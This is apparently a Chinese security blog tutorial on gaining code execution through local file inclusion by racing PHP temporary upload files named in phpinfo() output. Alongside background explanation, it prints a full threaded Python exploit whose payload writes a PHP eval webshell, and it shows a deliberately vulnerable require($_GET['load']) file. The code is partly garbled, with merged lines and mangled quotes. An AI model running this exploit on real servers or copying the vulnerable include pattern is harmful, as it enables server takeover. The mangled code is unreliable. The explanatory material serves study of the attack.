LFI with PHPInfo本地测试过程

2015-09-30 500309人围观 ,发现 18 个不明物体 WEB安全

原创作者‍:Drops@ZUT

LFI with PHPInfo是国外研究员在2001年公布的本地文件包含利用方法,作为新手,在国内却找不到完整的学习资料,经过几天的研究学习,把自己的学习过程进行总结,与大家共享。

基础知识

本地文件包含,英文Local File Include,简称LFI。文件包含是一种简化代码、提高代码重用率的方法。但是,由于没有正确处理用户输入,导致本地文件包含漏洞。黑客可以通过漏洞包含非PHP执行文件,如构造包含PHP代码的图片木马、临时文件、session文件、日志等来达到执行PHP代码的目的。

本地文件包含漏洞需要和精心构造的文件结合起来,才能发挥最大威力。这些精心构造的文件包括用户上传的文件、服务器产生的日志、session文件以及PHP程序创建的临时文件等等。尽管可以包含的文件有很多类型,但是也击中了本地文件包含的痛点–无法准确获取文件位置及文件名,只能通过猜测路径、文件名进行漏洞利用,这无疑增加了漏洞的利用难度。

进入LFI with PHPI

相关文件代码:

Phpinfo.php

 <?phpphpinfo();?>

Lfi.php

<?phprequire($_GET[';load';]);?>

下面介绍利用PHPInfo信息进行本地文件包含。【你应该知道的】

一、以上传文件的方式请求任意PHP文件,服务器都会创建临时文件来保存文件内容

在HTTP协议中为了方便进行文件传输,规定了一种基于表单的HTML文件传输方法

<form action="upload_file.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" /> 
<br />
<input type="submit" name="submit" value="Submit" />
</form>

其中PHP引擎对enctype=”multipart/form-data”这种请求的处理过程如下:

1、请求到达;

2、创建临时文件,并写入上传文件的内容;

3、调用相应PHP脚本进行处理,如校验名称、大小等;

4、删除临时文件。

PHP引擎会首先将文件内容保存到临时文件,然后进行相应的操作。

我们可以对phpinfo.php发起请求,查看服务端变化。由于处理时间极短,我们肉眼无法看到文件夹下临时文件的创建删除过程,可以选择sleep操作延长phpinfo脚本的时间,在慢镜头下,我们看到了生成的临时文件。其中临时文件内容正是我们POST请求中文件内容,临时文件的名称是php+随机数字.tmp,正中本地文件包含痛点。

 


通过刚才的实验,我们发现临时文件的生命周期很短,脚本执行完成后边删除临时文件。我们要做的就是在删除之前包含文件。下面继续。

二、PHPInfo可以输出$_FILES信息,包括临时文件路径、名称

在PHP中,有超全局变量$_FILES,保存上传文件的信息,包括文件名、类型、临时文件名、错误代号、大小。

 

Phpinfo()是一个无比强大的函数,可以输出大量的关于服务器的配置信息,其中包括超全局变量的值。

 

三、分块传输编码

通常,HTTP中的响应消息都是整个发送的,在发送之前知道Content-Lenth值,作为响应头的一部分发送给客户端。

分块传输编码,可以在不知道Content-Lenth情况下,进行分块传输,并把Content-Lenth置为chunked。PHP默认情况,当传输数据大于4KB时,采用分块传输编码。将数据分为一块或多块传输。传输格式是:

每一个非空的块都以该块包含数据的字节数(字节数以十六进制表示)开始,跟随一个CRLF (回车及换行),然后是数据本身,最后块CRLF结束。在一些实现中,块大小和CRLF之间填充有白空格(0x20)。

最后一块是单行,由块大小(0),一些可选的填充白空格,以及CRLF。

 

四、争取时间,在临时文件删除之前执行包含操作

利用PHPInfo进行本地文件包含的主要思想是在临时文件删除前执行操作。

我们需要争取时间,时间差大致来自三个方面:

1、通过分块传输编码,提前获知临时文件名称;

分块传输可以实现在未完全传输完成时即可获知临时文件名,可以尽早发起文件包含请求,赶在删除之前执行代码。

2、通过增加临时文件名后数据长度来延长时间;

通过观察PHPinfo的信息,在$_FILES信息下面,还有请求头的相关信息,我们可以在请求的时候,通过填充大量无用数据,来增加后面数据的长度,从而增加脚本的处理时间,为包含文件争取更多的时间。

3、通过大量请求来延迟PHP脚本的执行速度。

通过大量的并发请求,提高成功的概率。由于对PHP处理性能的不熟悉,做了一个简单的测试,记录大量多个请求下,每个脚本的运行时间,结果如下:

 

通过上面数据,我们可以看到脚本的运行时间有波动,当然其中应该有脚本的等待执行时间,也有很大可能降低了PHP脚本的运行能力,从而延长了时间。

Python代码:

# -*- coding: utf-8 -*-import sysimport socketimport threadingdef setup(host, port):
    ';';';
    初始化HTTP请求数据包
    TAG:校验包含是否成功标志
    PAYLOAD:包含要执行的PHP代码
    padding:增加数据块内容
    LFIREQ:文件包含请求
    REQ_DATA:POST请求数据
    REQ:完整POST请求
    ';';';
    TAG="Security Test"
    PAYLOAD="""%s
<?php
$c=fopen("H:/wamp/tmp/g.php",';w';);
fwrite($c,"<?php eval(';fb';);?>");
?>\r""" % TAG
    padding = "A" * 2000
    LFIREQ = """GET /lfi.php?load=%(file)s HTTP/1.1\r
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36\r
Connection: keep-alive\r
Host: %(host)s\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r
Upgrade-Insecure-Requests: 1\n
Accept-Encoding: gzip, deflate, sdch\n
\n"""
    REQ_DATA = """------WebKitFormBoundaryIYu6Un7AVVkBR0k6\r
Content-Disposition: form-data; name="file"; filename="shell.php"\r
Content-Type: application/octet-stream\r
\r
%s
------WebKitFormBoundaryIYu6Un7AVVkBR0k6\r
Content-Disposition: form-data; name="submit"\r
\r
Submit
------WebKitFormBoundaryIYu6Un7AVVkBR0k6--\r""" % PAYLOAD
    REQ = """POST /phpinfo.php HTTP/1.1\r
User-Agent: """ + padding + """\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r
Accept-Language: """ + padding + """\r
Accept-Encoding: gzip, deflate\r
Cache-Control: max-age=0\r
Referer: """ + padding + """\r
Connection: keep-alive\r
Upgrade-Insecure-Requests: 1\r
Host: %(host)s\r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYu6Un7AVVkBR0k6\r
Content-Length: %(len)s\r
\r
%(data)s""" % {';host';: host, ';len';: len(REQ_DATA), ';data';: REQ_DATA}
    return (REQ, TAG, LFIREQ)
 
 def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    ';';';
    :param host: 目标主机IP
    :param port: 端口
    :param phpinforeq: 对phpinfo文件的请求
    :param offset: 临时文件名位置
    :param lfireq:文件包含请求
    :param tag: 检测包含成功标志
    :return: 返回完整临时文件名
    ';';';
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s2.connect((host, port))
 
    s.send(phpinforeq)
    d = ""
    while len(d) < offset:
        d += s.recv(offset)
    try:
        i = d.index("[tmp_name] =>")
        fn = d[i+17:i+40]
    except ValueError:
        return None
    s2.send(lfireq % {';file';: fn, ';host';: host})
    d = s2.recv(4096)
    s.close()
    s2.close()
    if d.find(tag) != -1:
        return fn
 
counter = 0class ThreadWorker(threading.Thread):
    ';';';
    线程操作
    maxattempts:最大尝试次数
    ';';';
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e
        self.lock = l
        self.maxattempts = m
        self.args = args
    def run(self):
        global counter
        while not self.event.is_set():
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter += 1
            try:
                x = phpInfoLFI(*self.args)
                if self.event.is_set():
                    break
                if x:
                    print "\nGot it! Shell create in H:/wamp/tmp/g.php"
                    self.event.set()
            except socket.error:
                return
 def getOffset(host, port, phpinforeq):
    ';';';
    :param host: 目标主机IP
    :param port: 端口
    :param phpinforeq: 对phpinfo文件的POST请求
    :return:返回临时文件名在返回数据块中的位置
    ';';';
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(phpinforeq)
    d = ""
    while True:
        i = s.recv(4096)
        d += i
        if i == "":
            break
        if i.endswith("0\r\n\r\n"):
            break
    s.close()
    i = d.find("[tmp_name] =>")
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")
    print "found %s at %i" % (d[i:i+10], i)
    return i+256
 def main():
    print "LFI with PHPinfo()"
    if len(sys.argv) < 2:
        print "Usage:%s host [port] [poolsz]" % sys.argv[0]
        sys.exit(1)
    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error, e:
        print "Error with hostname %s: %s" % (sys.argv[1], e)
        sys.exit(1)
    port = 80
    try:
        port = int(sys.argv[2])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with port %d: %s" % (sys.argv[2], e)
        sys.exit(1)
    poolsz = 10
    try:
        poolsz = int(sys.argv[3])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with poolsz %d: %s" %(sys.argv[3], e)
        sys.exit(1)
    print "Getting initial offset..."
    phpinforeq, tag, lfireq = setup(host, port)
    offset = getOffset(host, port, phpinforeq)
    sys.stdout.flush()
    maxattempts = 200
    e = threading.Event()
    l = threading.Lock()
 
    print "Spawning worker pool (%d)..." % poolsz
    sys.stdout.flush()
 
    tp = []
    for i in range(0, poolsz):
        tp.append(ThreadWorker(e, l, maxattempts, host, port, phpinforeq, offset, lfireq, tag))
    for t in tp:
        t.start()
    try:
        while not e.wait(1):
            if e.is_set():
                break
            with l:
                sys.stdout.write("\r % 4d / % 4d" % (counter, maxattempts))
                sys.stdout.flush()
                if counter >= maxattempts:
                    break
        if e.is_set():
            print "Woot! \m/"
        else:
            print ":("
    except KeyboardInterrupt:
        print "\nTelling threads to shutdown..."
        e.set()
 
    for t in tp:
        t.join()
 if __name__ == "__main__":
    main()

运行成功示例:

 

心得

在学习过程中,自己了解很多看不太懂的英文资料,验证每一句的真伪,查看配置文件,整个过程没有囫囵吞枣,而是细细的品味每一个细节。Pyhton使用socket发送HTTP请求。总是因为编码格式,导致Bad Request,\r\n让自己头大,但是当自己看到Got it的时候,自己几天的学习,终于有了结果。甚是欣慰!

本次测试只在本地进行测试,在测试过程中,把padding的值设为很小,也能执行成功,最大的尝试次数需要在20以上才能成功。面对不同的网络环境需要设置不同值。

* 作者/Drops@ZUT,属FreeBuf黑客与极客(FreeBuf.COM)原创奖励计划文章,未经许可禁止转载

这些评论亮了

发表评论

已有 18 条评论

取消
Loading...
css.php